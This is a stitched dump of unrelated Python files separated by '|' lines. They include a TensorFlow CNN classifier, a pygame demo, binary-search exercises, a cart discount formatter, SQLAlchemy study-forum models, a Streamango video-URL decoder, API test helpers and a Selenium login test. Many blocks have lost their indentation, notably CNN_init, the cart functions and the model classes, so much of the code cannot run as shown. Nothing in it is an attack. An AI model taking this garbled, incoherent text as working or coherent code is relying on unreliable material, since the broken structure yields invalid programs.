# -*- coding: utf-8 -*-
"""
Created on Tue Feb 4 20:17:16 2020
@author: han
"""
import tensorflow as tf
import numpy as np
import os
import skimage
import keras
from sklearn.utils import shuffle
import matplotlib.pyplot as plt
def load_small_data(dir_path,m,flag):
    images_m=[]  ## list to hold the image data
    labels_m=[]  ## list to hold the labels
    images_show=[]
    lab_show=[]
    lab=os.listdir(dir_path)
    n=0
    for l in lab:
        if(n>=m):
            break
        img=os.listdir(dir_path+l)  ## img is the folder under the corresponding path
        if flag==True:
            images_show.append(skimage.data.imread(dir_path+l+'/'+img[0]))
            lab_show.append(l)
        for i in img:
            img_path=dir_path+l+'/'+i  ## build the image path
            labels_m.append(int(n))  ## store the index of the parent folder as the label
            images_m.append(skimage.data.imread(img_path))  ## read the image at img_path into images_m
        n+=1
    if flag==True:
        return images_m,labels_m,images_show,lab_show  ## m classes of labels and data
    else:
        return images_m,labels_m
def display_no5_img(no5_imgs,labels_no5):
    plt.figure(figsize=(15,15))  ## figure size 15x15
    for i in range(len(no5_imgs)):
        plt.subplot(5,1,(i+1))  ## 5 rows, one image per row
        plt.title("%s" %(labels_no5[i]))  ## show the title
        plt.imshow(no5_imgs[i])  ## show the image
        plt.axis('off')  ## hide the axes
    plt.show()
## Preprocess the data (convert to arrays, shuffle)
def prepare_data(images,labels,n_classes):
    ##images64=cut_image(images,64,64)  ## crop images to 64x64
    train_x=np.array(images)
    train_y=np.array(labels)
    ##images_gray=color.rgb2gray(images_a)  ## convert to grayscale
    indx=np.arange(0,train_y.shape[0])  ## indices 0..number of images
    indx=shuffle(indx)  ## shuffle() randomly reorders the indices
    train_x=train_x[indx]
    train_y=train_y[indx]  ## shuffled training set
    train_y=keras.utils.to_categorical(train_y,n_classes)  ## one-hot encoding
    # print(train_y)
    # print(np.shape(train_y))
    return train_x,train_y
def class_label(list_num, test_x):
label = []
lab=os.listdir("./Test")
for i in np.arange(5):
label.append(lab[list_num[i]])
display_no5_img(test_x[0:5], label)
## Convolution layer helper
def conv2d(x,W,b,stride=1):
    x=tf.nn.conv2d(x,W,strides=[1,stride,stride,1],padding="SAME")
    x=tf.nn.bias_add(x,b)
    return tf.nn.relu(x)
## Max-pooling layer helper
def maxpool2d(x,stride=2):
    return tf.nn.max_pool(x,ksize=[1,stride,stride,1],strides=[1,stride,stride,1],padding="SAME")
## Build the convolutional neural network
def conv_net(x,Weights,bias,dropout,fla):
    ## Convolutional layer 1
    conv1 = conv2d(x,Weights['con1_w'],bias['conv1_b'])  ## 100*100*64
    conv1 = maxpool2d(conv1,2)  ## after pooling layer 1, shape: 50*50*64
    ## Convolutional layer 2
    conv2 = conv2d(conv1,Weights['con2_w'],bias['conv2_b'])  ## 50*50*128
    conv2 = maxpool2d(conv2,2)  ## after pooling layer 2, shape: 25*25*128
    ## Fully connected layer 1
    flatten = tf.reshape(conv2,[-1,fla])  ## flatten the feature maps
    fc1 = tf.add(tf.matmul(flatten,Weights['fc_w1']),bias['fc_b1'])
    fc1 = tf.nn.relu(fc1)  ## relu activation
    # print(flatten.get_shape())
    ## Fully connected layer 2
    fc2 = tf.add(tf.matmul(fc1,Weights['fc_w2']),bias['fc_b2'])  ## output = input * weights + bias
    fc2 = tf.nn.relu(fc2)  ## relu activation
    ## Dropout (helps prevent overfitting)
    fc2 = tf.nn.dropout(fc2,dropout)
    ## Output class prediction
    prediction = tf.add(tf.matmul(fc2,Weights['out']),bias['out'])  ## output logits
    return prediction
def CNN_init():
    images_test_20,labels_test_20=load_small_data('./Test/',10,False)
    test_x,test_y=prepare_data(images_test_20,labels_test_20,10)
    n_classes=10  ## number of classes
    kernel_h=kernel_w=5  ## convolution kernel size
    depth_in=3  ## number of image channels
    depth_out1=64  ## number of kernels in conv layer 1
    depth_out2=128  ## number of kernels in conv layer 2
    image_size=test_x.shape[1]  ## image size
    fla=int((image_size*image_size/16)*depth_out2)  ## flatten size: image area after two conv+pool stages times the number of conv-2 kernels
    ckpt_file_path = "./CNNData/save_net.ckpt"
    tf.reset_default_graph()
Weights={"con1_w":tf.Variable(tf.random_normal([kernel_h,kernel_w,depth_in,depth_out1]), name = "con1_w"),
"con2_w":tf.Variable(tf.random_normal([kernel_h,kernel_w,depth_out1,depth_out2]), name = "con2_w"),
"fc_w1":tf.Variable(tf.random_normal([int((image_size*image_size/16)*depth_out2),1024]), name = "fc_w1"),
"fc_w2":tf.Variable(tf.random_normal([1024,512]), name = "fc_w2"),
"out":tf.Variable(tf.random_normal([512,n_classes]), name = "out1")}
    ## bias variables for each conv and fully connected layer
bias={"conv1_b":tf.Variable(tf.random_normal([depth_out1]), name = "conv1_b"),
"conv2_b":tf.Variable(tf.random_normal([depth_out2]), name = "conv2_b"),
"fc_b1":tf.Variable(tf.random_normal([1024]), name = "fc_b1"),
"fc_b2":tf.Variable(tf.random_normal([512]), name = "fc_b2"),
"out":tf.Variable(tf.random_normal([n_classes]), name = "out2")}
saver = tf.train.Saver()
sess = tf.Session()
saver.restore(sess, ckpt_file_path)
sess.run(Weights)
sess.run(bias)
    x=tf.placeholder(tf.float32,[None,100,100,3])
    keep_prob=tf.placeholder(tf.float32)  ## dropout placeholder (mitigates overfitting)
    prediction=conv_net(x,Weights,bias,keep_prob,fla)  ## build the CNN
dict_data = {'x':x,'keep_prob':keep_prob,'prediction':prediction, \
'Weights':Weights, 'bias':bias, "n_classes":n_classes}
return dict_data,sess
def run_CNN(x,keep_prob,prediction,img,sess):
test_feed={x:img,keep_prob: 0.8}
y1 = sess.run(prediction,feed_dict=test_feed)
test_classes = np.argmax(y1,1)
lab=os.listdir("./Test")
return lab[test_classes[0]]
def test_Accuracy(x,keep_prob,prediction,sess,n_classes):
    y=tf.placeholder(tf.float32,[None,n_classes])  ## type and shape of the label data fed to the network
    images_test_20,labels_test_20=load_small_data('./Test/',n_classes,False)
    test_x,test_y=prepare_data(images_test_20,labels_test_20,n_classes)
    ## Evaluate the model
correct_pred=tf.equal(tf.argmax(prediction,1),tf.argmax(y,1))
accuracy=tf.reduce_mean(tf.cast(correct_pred,tf.float32))
test_x=test_x[0:400]
test_y=test_y[0:400]
test_feed={x:test_x,y:test_y,keep_prob: 0.8}
# y1 = sess.run(prediction,feed_dict=test_feed)
# test_classes = np.argmax(y1,1)
# class_label(test_classes, test_x)
data = sess.run(accuracy,feed_dict=test_feed)
print('Testing Accuracy:',data)
return data
def batch_process(x,keep_prob,prediction,sess,img_set):
img_set = np.array(img_set)
test_feed={x:img_set,keep_prob: 0.8}
y1 = sess.run(prediction,feed_dict=test_feed)
test_classes = np.argmax(y1,1)
lab=np.array(os.listdir("./Test"))
return lab[test_classes]
if __name__ == '__main__':
dict_data,sess= CNN_init()
x1 = dict_data['x']
keep_prob = dict_data['keep_prob']
prediction = dict_data['prediction']
n_classes = dict_data['n_classes']
    test_Accuracy(x1,keep_prob,prediction,sess,n_classes)
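## A minimal usage sketch for single-image prediction (the image path below is
## a made-up placeholder; the placeholder x expects 100x100 RGB input):
#
#   img = skimage.data.imread('./Test/<class>/<image>.png')
#   print(run_CNN(x1, keep_prob, prediction, [img], sess))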
|
import pygame
import sys
from pygame.locals import *
pygame.init()
DISPLAYSURF = pygame.display.set_mode((400, 300), 0, 32)
pygame.display.set_caption("Drawing stuff")
#Palette of colors
BLACK = ( 0, 0, 0)
WHITE = (255, 255, 255)
RED = (255, 0, 0)
GREEN = ( 0, 255, 0)
BLUE = ( 0, 0, 255)
PURPLE= (160, 32, 240)
RANDOM= (210, 254, 17)
DISPLAYSURF.fill(BLACK)
pygame.draw.rect(DISPLAYSURF, PURPLE, (100, 150, 200 , 300))
pygame.draw.rect(DISPLAYSURF, BLUE, (150, 200, 50, 100))
pygame.draw.polygon(DISPLAYSURF, GREEN, ((200, 400), (200, 300), (200, 400)))
pygame.draw.rect(DISPLAYSURF, WHITE, (200, 50, 100, 150))
while True:
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
sys.exit()
pygame.display.update()
|
# TODO: complete in free time
def binary(_list, _element):
    """Iterative binary search: return True if _element is in the sorted _list."""
    found = False
    start_index = 0
    end_index = len(_list) - 1
    while start_index <= end_index:
        center_index = (start_index + end_index) // 2
        element_from_center = _list[center_index]
        if _element == element_from_center:  # hit at the center
            found = True
            break
        elif _element > element_from_center:  # search the right half
            start_index = center_index + 1
        else:  # _element < element_from_center, search the left half
            end_index = center_index - 1
    return found
numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 12, 15, 33, 88, 95, 123, 456, 789]
number = 33
print(binary(numbers, number))
|
""" Add directory to path, tests should import from this file. """
import os
import sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from the_exif_mutalator import cli, logging_config, tem # pylint: disable=wrong-import-position,unused-import
|
#!/usr/bin/env python
from collections import namedtuple
# Application data model
LineItem = namedtuple('LineItem', ['product_id', 'quantity'])
Order = namedtuple('Order', ['line_items', 'discount_code'])
Discount = namedtuple('Discount', ['code', 'percentage', 'type', 'product_ids'])
Product = namedtuple('Product', ['name', 'price_cents'])
Application = namedtuple('CartApplication', ['products', 'discounts'])
# Internal class for cart calculations
ItemPrice = namedtuple('ItemPrice', ['lineitem', 'product', 'price'])
def get_product(application, product_id):
""" Return the Product instance for a product id. """
return application.products[product_id]
def get_discount(application, discount_code):
    """ Return the Discount instance for a code, or None if not found. """
    if discount_code:
        discount = [
            d
            for d in application.discounts.values()
            if d.code == discount_code
        ]
        return discount[0] if discount else None
    return None
def format_price_dollars_cents(price):
""" Format a price as dollars with 2 decimals. """
return "${:.2f}".format(price)
def format_originalprice(itemprice):
""" Format the original price if discount applied. """
originalprice = itemprice.product.price_cents * itemprice.lineitem.quantity
if originalprice != itemprice.price:
return "(Original Price ${:.2f})".format(originalprice)
else:
return ""
def format_itemprice(itemprice, discount_code):
""" Format the display of an ItemPrice. """
if not discount_code:
return "{} copy of \"{}\" for ${:.2f}".format(
itemprice.lineitem.quantity,
itemprice.product.name,
itemprice.price
)
else:
        # Right-align the price and original-price fields so the columns line up
return "{:>6} {:>23} for {} copy of \"{}\"".format(
format_price_dollars_cents(itemprice.price),
format_originalprice(itemprice),
itemprice.lineitem.quantity,
itemprice.product.name
)
def apply_product_discount(lineitem, discount, price):
""" Apply the discount for a product if applicable. """
if lineitem.product_id in discount.product_ids:
# Round to cents
return round(price * (1.0 - (discount.percentage / 100)), 2)
else:
return price
def apply_discount(discount, itemprices):
""" Apply discount for all applicable products. """
if discount and discount.type == 'all':
# TODO: Currently handled separately from product-specific discounts but the two could be consolidated
return [
ItemPrice(lineitem=p.lineitem,
product=p.product,
# Round to cents per item even though full order is discounted
price=round(p.price * (1.0 - (discount.percentage / 100)), 2))
for p in itemprices
]
elif discount and discount.type == 'product_list':
return [
ItemPrice(lineitem=p.lineitem,
product=p.product,
price=apply_product_discount(p.lineitem, discount, p.price))
for p in itemprices
]
else:
# No discounts applied
return itemprices
def display_cart(application, order):
""" Process items in an order and output formatted string of cart. """
itemprices = [
ItemPrice(lineitem=lineitem,
product=get_product(application, lineitem.product_id),
price=get_product(application, lineitem.product_id).price_cents * lineitem.quantity)
for lineitem in order.line_items
if lineitem.product_id in application.products
]
discount = get_discount(application, order.discount_code)
itemprices = apply_discount(discount, itemprices)
display_prices = [format_itemprice(i, order.discount_code) for i in itemprices]
total_price = sum([x.price for x in itemprices])
return """Your cart:
{}
---
Total ${:.2f}""".format(
'\n'.join(display_prices),
total_price
)
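# A minimal usage sketch (the product ids, names, and discount code below are
# made-up sample data; prices follow the dollar-float convention of the
# "${:.2f}" formatters above):
if __name__ == '__main__':
    app = Application(
        products={'p1': Product(name='Widget', price_cents=5.00),
                  'p2': Product(name='Gadget', price_cents=12.50)},
        discounts={'d1': Discount(code='SAVE10', percentage=10,
                                  type='all', product_ids=[])})
    order = Order(line_items=[LineItem(product_id='p1', quantity=2),
                              LineItem(product_id='p2', quantity=1)],
                  discount_code='SAVE10')
    print(display_cart(app, order))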
|
# -*- coding: utf8 -*-
# from app import bcrypt, db
from app import db
from sqlalchemy.ext.hybrid import hybrid_property
from sqlalchemy import *
from sqlalchemy.dialects import mysql
class NewsBasic(db.Model):
__tablename__ = 'news_basic'
__table_args__ = {'schema': 'study'}
id = db.Column('id', mysql.INTEGER(display_width=11, unsigned=True), primary_key=True, nullable=False)
articleId = db.Column('articleId', mysql.INTEGER(display_width=11), nullable=False, default='0')
articleType = db.Column('articleType', VARCHAR(length=32), nullable=False, default='')
provinceId = db.Column('provinceId', VARCHAR(length=32), nullable=False, default='')
# provinceId = db.Column('provinceId', db.ForeignKey('province.province_id'))
majorId = db.Column('majorId', VARCHAR(length=32), nullable=False, default='')
instruction = db.Column('instruction', VARCHAR(length=256), nullable=False, default='')
attachUrl = db.Column('attachUrl', VARCHAR(length=256), nullable=False, default='')
thumbNum = db.Column('thumbNum', mysql.INTEGER(display_width=11), nullable=False, default='0')
transmitNum = db.Column('transmitNum', mysql.INTEGER(display_width=11), nullable=False, default='0')
commentNum = db.Column('commentNum', mysql.INTEGER(display_width=11), nullable=False, default='0')
createdTime = db.Column('createdTime', TIMESTAMP(), nullable=False, default=func.current_timestamp())
expiredAt = db.Column('expiredAt', TIMESTAMP(), nullable=False, default=func.current_timestamp())
briefText = db.Column('briefText', VARCHAR(length=256), nullable=False, default='')
panelUrl = db.Column('panelUrl', VARCHAR(length=256), nullable=False, default='')
handPicked = db.Column('handPicked', mysql.INTEGER(display_width=11), nullable=False, default='0')
class NewsComment(db.Model):
__tablename__ = 'news_comment'
__table_args__ = {'schema': 'study'}
id = db.Column('id', mysql.INTEGER(display_width=11, unsigned=True), primary_key=True, nullable=False)
articleId = db.Column('articleId', mysql.INTEGER(display_width=11), nullable=False, default='0')
uid = db.Column('uid', VARCHAR(collation=u'utf8mb4_bin', length=32), nullable=False, default='')
content = db.Column('content', VARCHAR(collation=u'utf8mb4_bin', length=1024), nullable=False, default='')
commentTime = db.Column('commentTime', TIMESTAMP(), nullable=False, default=func.current_timestamp())
parentId = db.Column('parentId', mysql.INTEGER(display_width=11), nullable=False, default='0')
class NewsDetail(db.Model):
__tablename__ = 'news_detail'
__table_args__ = {'schema': 'study'}
id = db.Column('id', mysql.INTEGER(display_width=11, unsigned=True), primary_key=True, nullable=False)
author = db.Column('author', VARCHAR(length=32), nullable=False, default='')
content = db.Column('content', TEXT())
class NewsFavorites(db.Model):
__tablename__ = 'news_favorites'
__table_args__ = {'schema': 'study'}
id = db.Column('id', mysql.INTEGER(display_width=11, unsigned=True), primary_key=True, nullable=False)
uid = db.Column('uid', VARCHAR(length=32), nullable=False, default='')
articleId = db.Column('articleId', mysql.INTEGER(display_width=11), nullable=False, default='0')
collectTime = db.Column('collectTime', TIMESTAMP(), nullable=False, default=func.current_timestamp())
class NewsThumb(db.Model):
__tablename__ = 'news_thumb'
__table_args__ = {'schema': 'study'}
id = db.Column('id', mysql.INTEGER(display_width=11, unsigned=True), primary_key=True, nullable=False)
uid = db.Column('uid', VARCHAR(length=32), nullable=False, default='')
articleId = db.Column('articleId', mysql.INTEGER(display_width=11), nullable=False, default='0')
thumbTime = db.Column('thumbTime', TIMESTAMP(), nullable=False, default=func.current_timestamp())
class Province(db.Model):
__tablename__ = 'province'
__table_args__ = {'schema': 'study'}
province_id = db.Column('province_id', VARCHAR(length=20), primary_key=True, nullable=False)
province_name = db.Column('province_name', VARCHAR(length=50), nullable=False)
# news_basics = db.relationship('NewsBasic', backref='province', lazy='dynamic')
class Major(db.Model):
__tablename__ = 'major'
__table_args__ = {'schema': 'study'}
province_name = db.Column('province_name', VARCHAR(length=20), nullable=False, primary_key=True)
major_name = db.Column('major_name', VARCHAR(length=50), nullable=False)
major_id = db.Column('major_id', VARCHAR(length=20), nullable=False, primary_key=True)
major_stage = db.Column('major_stage', VARCHAR(length=20), nullable=False, default='')
major_university = db.Column('major_university', VARCHAR(length=50), nullable=False, default='')
subject_seq = db.Column('subject_seq', VARCHAR(length=20), nullable=False)
subject_name = db.Column('subject_name', VARCHAR(length=50), nullable=False)
subject_id = db.Column('subject_id', VARCHAR(length=20), primary_key=True)
exam_mode = db.Column('exam_mode', VARCHAR(length=20))
exam_type = db.Column('exam_type', VARCHAR(length=100))
subject_property = db.Column('subject_property', VARCHAR(length=20))
exam_month = db.Column('exam_month', VARCHAR(length=20))
book_name = db.Column('book_name', VARCHAR(length=50))
book_author = db.Column('book_author', VARCHAR(length=50))
book_publisher = db.Column('book_publisher', VARCHAR(length=50))
book_version = db.Column('book_version', VARCHAR(length=50))
book_channel = db.Column('book_channel', VARCHAR(length=50))
book_id = db.Column('book_id', VARCHAR(length=50))
remark = db.Column('remark', TEXT())
wenli_flag = db.Column('wenli_flag', VARCHAR(length=20))
class Account(db.Model):
__tablename__ = 'account'
__table_args__ = {'schema': 'study'}
uid = db.Column('uid', VARCHAR(collation=u'utf8mb4_bin', length=128), primary_key=True, nullable=False, default='')
nickname = db.Column('nickname', VARCHAR(collation=u'utf8mb4_bin', length=32), nullable=False, default='')
passWord = db.Column('passWord', VARCHAR(collation=u'utf8mb4_bin', length=128), nullable=False, default='')
phone = db.Column('phone', VARCHAR(collation=u'utf8mb4_bin', length=32), nullable=False, default='')
profileUrl = db.Column('profileUrl', VARCHAR(collation=u'utf8mb4_bin', length=256), nullable=False, default='')
registerTime = db.Column('registerTime', TIMESTAMP(), nullable=False, default=func.current_timestamp())
accountType = db.Column('accountType', VARCHAR(collation=u'utf8mb4_bin', length=32), nullable=False, default='')
gender = db.Column('gender', VARCHAR(collation=u'utf8mb4_bin', length=32), nullable=False, default='DEFAULT')
registerChannel = db.Column('registerChannel', VARCHAR(collation=u'utf8mb4_bin', length=110))
qqToken = db.Column('qqToken', VARCHAR(collation=u'utf8mb4_bin', length=128), nullable=False, default='')
weixinToken = db.Column('weixinToken', VARCHAR(collation=u'utf8mb4_bin', length=128), nullable=False, default='')
weiboToken = db.Column('weiboToken', VARCHAR(collation=u'utf8mb4_bin', length=128), nullable=False, default='')
imei = db.Column('imei', VARCHAR(collation=u'utf8mb4_bin', length=128))
majorId = db.Column('majorId', VARCHAR(collation=u'utf8mb4_bin', length=20))
class Collects(db.Model):
__bind_key__ = 'bbs'
__tablename__ = 'collects'
__table_args__ = {'schema': 'bbs'}
topic_id = db.Column('topic_id', mysql.INTEGER(display_width=11), primary_key=True, nullable=False)
user_id = db.Column('user_id', VARCHAR(collation=u'utf8mb4_unicode_ci', length=50), primary_key=True, nullable=False)
status = db.Column('status', mysql.TINYINT(display_width=4), nullable=False)
update_time = db.Column('update_time', mysql.BIGINT(display_width=20), nullable=False)
class Comments(db.Model):
__bind_key__ = 'bbs'
__tablename__ = 'comments'
__table_args__ = {'schema': 'bbs'}
comment_id = db.Column('comment_id', mysql.INTEGER(display_width=11), primary_key=True, nullable=False)
content = db.Column('content', mysql.MEDIUMTEXT(collation=u'utf8mb4_unicode_ci'))
pub_time = db.Column('pub_time', mysql.BIGINT(display_width=20), nullable=False)
pub_area = db.Column('pub_area', VARCHAR(collation=u'utf8mb4_unicode_ci', length=50))
pub_client = db.Column('pub_client', VARCHAR(collation=u'utf8mb4_unicode_ci', length=20))
images = db.Column('images', mysql.MEDIUMTEXT(collation=u'utf8mb4_unicode_ci'))
status = db.Column('status', mysql.TINYINT(display_width=4), nullable=False)
topic_id = db.Column('topic_id', mysql.INTEGER(display_width=11), nullable=False)
forum_id = db.Column('forum_id', mysql.INTEGER(display_width=11), nullable=False)
user_id = db.Column('user_id', VARCHAR(collation=u'utf8mb4_unicode_ci', length=50), nullable=False)
user_name = db.Column('user_name', VARCHAR(collation=u'utf8mb4_unicode_ci', length=50), nullable=False)
reply_id = db.Column('reply_id', mysql.INTEGER(display_width=11))
reply_floor_no = db.Column('reply_floor_no', mysql.INTEGER(display_width=11))
reply_user_id = db.Column('reply_user_id', VARCHAR(collation=u'utf8mb4_unicode_ci', length=50))
reply_user_name = db.Column('reply_user_name', VARCHAR(collation=u'utf8mb4_unicode_ci', length=50))
reply_content = db.Column('reply_content', mysql.MEDIUMTEXT(collation=u'utf8mb4_unicode_ci'))
class Follows(db.Model):
__bind_key__ = 'bbs'
__tablename__ = 'follows'
__table_args__ = {'schema': 'bbs'}
forum_id = db.Column('forum_id', mysql.INTEGER(display_width=11), primary_key=True, nullable=False)
user_id = db.Column('user_id', VARCHAR(length=50), primary_key=True, nullable=False)
status = db.Column('status', mysql.TINYINT(display_width=4), nullable=False)
update_time = db.Column('update_time', mysql.BIGINT(display_width=20), nullable=False)
class Forums(db.Model):
__bind_key__ = 'bbs'
__tablename__ = 'forums'
__table_args__ = {'schema': 'bbs'}
forum_id = db.Column('forum_id', mysql.INTEGER(display_width=11), primary_key=True, nullable=False)
name = db.Column('name', VARCHAR(collation=u'utf8mb4_unicode_ci', length=100), nullable=False)
description = db.Column('description', VARCHAR(collation=u'utf8mb4_unicode_ci', length=500), nullable=False)
image = db.Column('image', mysql.MEDIUMTEXT(collation=u'utf8mb4_unicode_ci'))
province_id = db.Column('province_id', VARCHAR(collation=u'utf8mb4_unicode_ci', length=20))
major_id = db.Column('major_id', VARCHAR(collation=u'utf8mb4_unicode_ci', length=20))
last_modify_time = db.Column('last_modify_time', mysql.BIGINT(display_width=20), nullable=False)
class Praises(db.Model):
__bind_key__ = 'bbs'
__tablename__ = 'praises'
__table_args__ = {'schema': 'bbs'}
topic_id = db.Column('topic_id', mysql.INTEGER(display_width=11), primary_key=True, nullable=False)
user_id = db.Column('user_id', VARCHAR(collation=u'utf8mb4_unicode_ci', length=50), primary_key=True, nullable=False)
status = db.Column('status', mysql.TINYINT(display_width=4), nullable=False)
update_time = db.Column('update_time', mysql.BIGINT(display_width=20), nullable=False)
class Topics(db.Model):
__bind_key__ = 'bbs'
__tablename__ = 'topics'
__table_args__ = {'schema': 'bbs'}
topic_id = db.Column('topic_id', mysql.INTEGER(display_width=11), primary_key=True, nullable=False)
title = db.Column('title', VARCHAR(collation=u'utf8mb4_unicode_ci', length=100), nullable=False)
content = db.Column('content', mysql.MEDIUMTEXT(collation=u'utf8mb4_unicode_ci'))
pub_time = db.Column('pub_time', mysql.BIGINT(display_width=20), nullable=False)
pub_area = db.Column('pub_area', VARCHAR(collation=u'utf8mb4_unicode_ci', length=50))
pub_client = db.Column('pub_client', VARCHAR(collation=u'utf8mb4_unicode_ci', length=20))
images = db.Column('images', mysql.MEDIUMTEXT(collation=u'utf8mb4_unicode_ci'))
    status = db.Column('status', mysql.TINYINT(display_width=4), nullable=False) # 2 = pinned, 1 = normal, 0 = deleted
    topic_level = db.Column('topic_level', mysql.TINYINT(display_width=4), nullable=False) # 1 = featured post, 0 = normal post
user_id = db.Column('user_id', VARCHAR(collation=u'utf8mb4_unicode_ci', length=50), nullable=False)
forum_id = db.Column('forum_id', mysql.INTEGER(display_width=11), nullable=False)
last_modify_time = db.Column('last_modify_time', mysql.BIGINT(display_width=20), nullable=False)
class Views(db.Model):
__bind_key__ = 'bbs'
__tablename__ = 'views'
__table_args__ = {'schema': 'bbs'}
topic_id = db.Column('topic_id', mysql.INTEGER(display_width=11), primary_key=True, nullable=False)
user_id = db.Column('user_id', VARCHAR(collation=u'utf8mb4_unicode_ci', length=50), primary_key=True, nullable=False)
view_num = db.Column('view_num', mysql.INTEGER(display_width=11), nullable=False)
update_time = db.Column('update_time', mysql.BIGINT(display_width=20), nullable=False)
|
def binarySearch(A,B,n):
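    # Returns the largest mid in [0, n] such that A[0..mid-1] <= B[n-mid..n-1]
    # elementwise, i.e. the longest prefix of A whose items can each be paired
    # with one of the mid largest items of B (both lists assumed sorted ascending).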
low,high = 0,n
while(low < high):
mid = low + (high-low+1)//2
flag = 1
for index in range(mid):
if(A[index] > B[n+index-mid]):
flag = 0
if(flag == 0):
high = mid - 1
else:
low = mid
return low
test = int(input())
for _ in range(test):
n = int(input())
a = list(map(int,input().split()))
num = 1
b = []
for em in a:
if(em == num):
num += 1
continue
else:
for i in range(num,em):
b.append(i)
num = em + 1
for i in range(num,2*n+1):
b.append(i)
index1 = binarySearch(a,b,n)
index2 = n - binarySearch(b,a,n)
print(max(0,index1 - index2 + 1))
|
# -*- coding: utf-8 -*-
# Resolves movie URLs from most hosting websites
import re, sys
class Streamango():
    def decode(self, encoded, code):
        # from https://github.com/jsergio123/script.module.urlresolver - kodi vstream
        # Base64-style decoding over a reversed alphabet; the first byte of
        # each 4-character group is XOR-ed with `code`.
        _0x59b81a = ""
        k = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='
        k = k[::-1]
        count = 0
        while count <= len(encoded) - 1:
            _0x4a2f3a = k.index(encoded[count])
            count += 1
            _0x29d5bf = k.index(encoded[count])
            count += 1
            _0x3b6833 = k.index(encoded[count])
            count += 1
            _0x426d70 = k.index(encoded[count])
            count += 1
            _0x2e4782 = ((_0x4a2f3a << 2) | (_0x29d5bf >> 4))
            _0x2c0540 = (((_0x29d5bf & 15) << 4) | (_0x3b6833 >> 2))
            _0x5a46ef = ((_0x3b6833 & 3) << 6) | _0x426d70
            _0x2e4782 = _0x2e4782 ^ code
            _0x59b81a = str(_0x59b81a) + chr(_0x2e4782)
            if _0x3b6833 != 64:
                _0x59b81a = str(_0x59b81a) + chr(_0x2c0540)
            if _0x426d70 != 64:
                _0x59b81a = str(_0x59b81a) + chr(_0x5a46ef)
        return _0x59b81a
def getMediaUrl(self, sourceCode):
#sourceCode = self.net.http_GET(self.url, headers=self.headers).content.decode('unicode_escape')
videoUrl = ''
        resultado = re.search(r'''srces\.push\({type:"video/mp4",src:\w+\('([^']+)',(\d+)''', sourceCode)
if resultado:
source = self.decode(resultado.group(1), int(resultado.group(2)))
if source:
source = "http:%s" % source if source.startswith("//") else source
source = source.split("/")
if not source[-1].isdigit():
                    source[-1] = re.sub(r'[^\d]', '', source[-1])
videoUrl = "/".join(source)
return videoUrl
|
#!/usr/bin/env python
# coding: utf-8
# Copyright (c) Qotto, 2019
""" Contains all partitioner errors
"""
__all__ = [
'BadKeyType',
'OutsideInstanceNumber'
]
class BadKeyType(TypeError):
    """BadKeyType
    Raised by KeyPartitioner when the key is not bytes
    """
class OutsideInstanceNumber(SystemError):
    """OutsideInstanceNumber
    Raised by StateFulSetPartitioner when the instance number is out of range
    """
|
def a():
return 1
def b():
x=a()
print(x)
b()
|
from common.run_method import RunMethod
import allure
@allure.step("极运营/营销中心/商品中心/新建编辑商品")
def goods_course_saveGoods_post(params=None, body=None, header=None, return_json=True, **kwargs):
    '''
    :param: query parameters appended to the URL
    :body: request body
    :return_json: whether to return the response as JSON (default: yes)
    :header: request headers
    :host: target environment
    :return: JSON response by default; the raw response if return_json=False
    '''
name = "极运营/营销中心/商品中心/新建编辑商品"
url = f"/service-gos/goods/course/saveGoods"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极运营/营销中心/商品中心/面授课程商品列表")
def goods_course_goodsList_post(params=None, body=None, header=None, return_json=True, **kwargs):
    '''
    :param: query parameters appended to the URL
    :body: request body
    :return_json: whether to return the response as JSON (default: yes)
    :header: request headers
    :host: target environment
    :return: JSON response by default; the raw response if return_json=False
    '''
name = "极运营/营销中心/商品中心/面授课程商品列表"
url = f"/service-gos/goods/course/goodsList"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极运营/营销中心/商品中心/商品详情")
def goods_course_goodsDetail_get(params=None, header=None, return_json=True, **kwargs):
    '''
    :param: query parameters appended to the URL
    :body: request body
    :return_json: whether to return the response as JSON (default: yes)
    :header: request headers
    :host: target environment
    :return: JSON response by default; the raw response if return_json=False
    '''
name = "极运营/营销中心/商品中心/商品详情"
url = f"/service-gos/goods/course/goodsDetail"
res = RunMethod.run_request("GET", url, params=params, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极运营/营销中心/商品中心/停用启用商品")
def goods_course_updateGoodsStatus_patch(params=None, body=None, header=None, return_json=True, **kwargs):
    '''
    :param: query parameters appended to the URL
    :body: request body
    :return_json: whether to return the response as JSON (default: yes)
    :header: request headers
    :host: target environment
    :return: JSON response by default; the raw response if return_json=False
    '''
name = "极运营/营销中心/商品中心/停用启用商品"
url = f"/service-gos/goods/course/updateGoodsStatus"
res = RunMethod.run_request("PATCH", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极运营/营销中心/商品中心/删除商品")
def goods_course_deleteGoods_delete(params=None, body=None, header=None, return_json=True, **kwargs):
    '''
    :param: query parameters appended to the URL
    :body: request body
    :return_json: whether to return the response as JSON (default: yes)
    :header: request headers
    :host: target environment
    :return: JSON response by default; the raw response if return_json=False
    '''
name = "极运营/营销中心/商品中心/删除商品"
url = f"/service-gos/goods/course/deleteGoods"
res = RunMethod.run_request("DELETE", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
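# A minimal usage sketch (the goodsId value and token header are made-up
# placeholders, not part of this module):
#
#   detail = goods_course_goodsDetail_get(params={"goodsId": 123},
#                                         header={"token": "..."})
#   print(detail)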
|
import pytest
from pageObjects.LoginPage import LoginPage
from utilities.readProperties import ReadConfig
from utilities.customLogger import CustomLogger
class TestLogin001:
baseURL = ReadConfig.getURL()
username = ReadConfig.getUname()
password = ReadConfig.getPass()
logger = CustomLogger.customerlogger()
@pytest.mark.smoke
@pytest.mark.sanity
def test_welcome_page(self, setup):
self.logger.info("****** TestLogin001_test_welcome_page Started ******")
self.logger.info("****** Importing setup ******")
self.driver = setup
self.driver.get(self.baseURL)
title = self.driver.title
self.logger.info("****** Verifying title ******")
if title == "Swag Labs":
self.logger.info("****** Success ******")
self.driver.close()
assert True
else:
self.logger.error("****** Failed ******")
